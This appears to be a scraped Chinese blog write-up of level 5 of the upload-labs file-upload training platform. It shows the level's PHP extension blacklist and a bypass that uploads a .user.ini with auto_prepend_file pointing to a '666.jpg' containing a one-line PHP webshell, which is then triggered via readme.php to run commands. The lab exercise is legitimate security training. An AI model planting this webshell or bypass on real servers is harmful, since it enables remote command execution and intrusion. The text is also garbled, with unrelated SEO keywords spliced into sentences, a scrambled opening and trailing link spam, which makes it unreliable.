您现在的位置是:测试开发营 > 数据库
Upload-Lab第五关:如何巧妙利用.user.ini配置文件绕过黑名单验证
测试开发营2025-11-26 18:23:27【数据库】3人已围观
简介关卡介绍upload-lab是一个用于练习文件上传漏洞的演练平台。在第五关中,我们将探索如何利用.user.ini文件包含漏洞来攻破这一关卡。此关卡的核心在于利用PHP的user_ini文件特性绕过安
upload-lab是关何过黑一个用于练习文件上传漏洞的演练平台 。在第五关中,巧妙我们将探索如何利用 .user.ini 文件包含漏洞来攻破这一关卡。利用此关卡的置文核心在于利用PHP的 user_ini文件特性绕过安全检查,最终实现恶意代码执行 。名单

以下第5关的验证核心代码 :
复制is_upload = false; $msg = null; if (isset($_POST[submit])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"); $file_name = trim($_FILES[upload_file][name]); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, .); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace(::$DATA, , $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //首尾去空 if (!in_array($file_ext, $deny_ext)) { $temp_file = $_FILES[upload_file][tmp_name]; $img_path = UPLOAD_PATH./.$file_name; if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true; } else { $msg = 上传出错!; } } else { $msg = 此文件类型不允许上传 !关何过黑; } } else { $msg = UPLOAD_PATH . 文件夹不存在,巧妙请手工创建 !; } }1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.在观察源码后,利用发现源码中将所有可解析的置文文件后缀名都明确列出,云计算包括大小写转换、名单空格和点号等处理 。验证因此 ,关何过黑无法正常上传PHP类文件,巧妙并且 .htaccess文件的利用上传也被拒绝。然而,通过仔细检查,发现有两个后缀名没有被限制,它们是 .php7和 .ini。
关于user.ini从 PHP 5.3.0 开始,PHP 支持每个目录使用 .user.ini 文件 ,这类似于 Apache 的 .htaccess 文件 。这种文件只会被 CGI/FastCGI 模式的服务器租用 PHP 处理,因此 PECL 的 htscanner 扩展就不再需要了。如果你使用 Apache 服务器,可以通过 .htaccess 文件实现相同的效果 。
除了主配置文件 php.ini 之外 ,PHP 还会在每个目录中查找 .user.ini 文件,从执行的 PHP 文件所在目录一直向上查找,直到找到 web 根目录(由 $_SERVER[DOCUMENT_ROOT] 指定) 。如果 PHP 文件在 web 根目录之外 ,只会扫描该目录。
在 .user.ini 文件中 ,只能使用具有 PHP_INI_PERDIR和PHP_INI_USER 模式的配置指令 。模板下载
有两个新的配置指令控制 .user.ini 文件的使用 :
user_ini.filename :设置 PHP 在每个目录中查找的文件名 。如果设置为空字符串,PHP 就不会查找这些文件。默认值是 .user.ini。user_ini.cache_ttl :控制重新读取 .user.ini 文件的时间间隔 。默认是 300 秒(5 分钟) 。.user.ini 文件中的配置会像 php.ini 中的配置一样被 PHP 处理,这可能会导致文件解析漏洞。高防服务器要触发 .user.ini 解析漏洞 ,需要满足以下三个条件:
服务器使用PHP作为脚本语言。服务器运行在 CGI/FastCGI 模式下。上传目录中有可执行的PHP文件。解法步骤(1) 编写 .user.ini 文件
首先,我们需要创建一个 .user.ini 文件 ,以指示服务器在每个请求前包含我们的 666.jpg 文件 。创建一个名为 .user.ini 的文件 ,内容如下 :
复制auto_prepend_file=666.jpg1.该配置将使得 666.jpg在每个PHP请求前自动包含 。
(2) 编写恶意 PHP文件
接下来 ,我们需要一个包含恶意代码的PHP文件。这个文件将在 .user.ini 被解析后自动被包含并执行。建站模板创建一个名为 666.jpg 的文件,内容如下 :
复制<?phpecho shell_exec($_GET[pass]); ?>1.(3) 上传文件
先将 .user.ini 文件上传到服务器 ,接着,再将666.jpg上传到服务器 。

user_ini文件受到user_ini.cache_ttl这个参数影响,这里有两个选择 :
慢慢的等候5分钟 ,再去访问直接进去修改php-ini配置文件把这里的300秒(即默认等5分钟)改为10 :

修改后保存php.ini文件并重启服务,静心等候10秒后再进行下一步操作。
(4) 访问并执行
根据关卡5的提示,upload目录中存在一个readme.php,如下图所示 :

提示
我通过访问这个readme.php文件 ,去触发自己上传的脚本文件。源码库该请求将执行 id 命令,并显示当前用户详细信息。如图所示:

webshell执行成功
总结在upload-lab的第五关中,我们利用 .user.ini文件的特性 ,成功绕过了服务器的安全检查并执行了恶意代码 。这种攻击方式主要依赖于对 PHP 配置文件的理解和巧妙利用 ,为安全研究人员提供了一个有趣且实用的学习案例 。
推荐阅读:
《Upload-Lab第一关 :轻松绕过前端验证的技巧 !》
《Upload-Lab第二关:如何巧妙绕过MIME类型过滤 ?》
《Upload-Lab第三关:如何巧妙应对黑名单文件后缀检测?》
《Upload-Lab第四关 :如何巧用.htaccess破解黑名单验证》
很赞哦!(94)
相关文章
- 派拓网络发布报告《2024年勒索软件回顾:Unit 42泄密网站分析》
- 如何正确搬运台式电脑机箱(操作指南和注意事项)
- 轻松掌握电脑照片调色技巧(从入门到精通,打造专业级的照片效果)
- WPS演示文稿电脑版图片转文字的方法教程
- 升级为Rust,Hive勒索软件加密将变得更加复杂
- 用手机和电脑制作棉花娃娃教程(简单易学的棉花娃娃制作指南,从手机到电脑全面解析制作过程)
- 陶瓷电脑雕刻编程教程全套(用电脑探索创意之美,学习陶瓷电脑雕刻编程的关键步骤)
- 美的无风感空调的性能和使用体验(舒适静音,智能省电,给您带来全新的空调体验)
- 施耐德电气遭勒索软件攻击重创,TB级数据泄漏
- 台式电脑音响设置教程(打造卓越音质,让电脑音乐更悦耳)
热门文章
站长推荐
友情链接
- 揭秘苹果耳机6s音质的绝佳表现(聆听细节世界,感受耳边的音乐奇迹)
- AMDA87410处理器的性能及特点分析(探索AMDA87410处理器的优势和应用领域)
- SKG抽油烟机质量评测(全面分析SKG抽油烟机的性能与可靠性)
- 数据中心电源的五大趋势
- M8peg与750比较(一探M8peg和750处理器之间的差异与应用场景选择)
- 比较骁龙410和435(骁龙410与435的区别以及适用场景)
- 中兴红牛v5电信版(一款高性能电信版手机,满足您的需求)
- Root之后手机的变化及影响(探索手机root后的功能和风险)
- iPhone7防抖技术(探索iPhone7防抖技术的出色表现和关键特性)
- 中兴A2015顶配(性能强大,拍照出色,超高性价比引领市场潮流) 源码库网站建设香港物理机云服务器企业服务器亿华云b2b信息平台







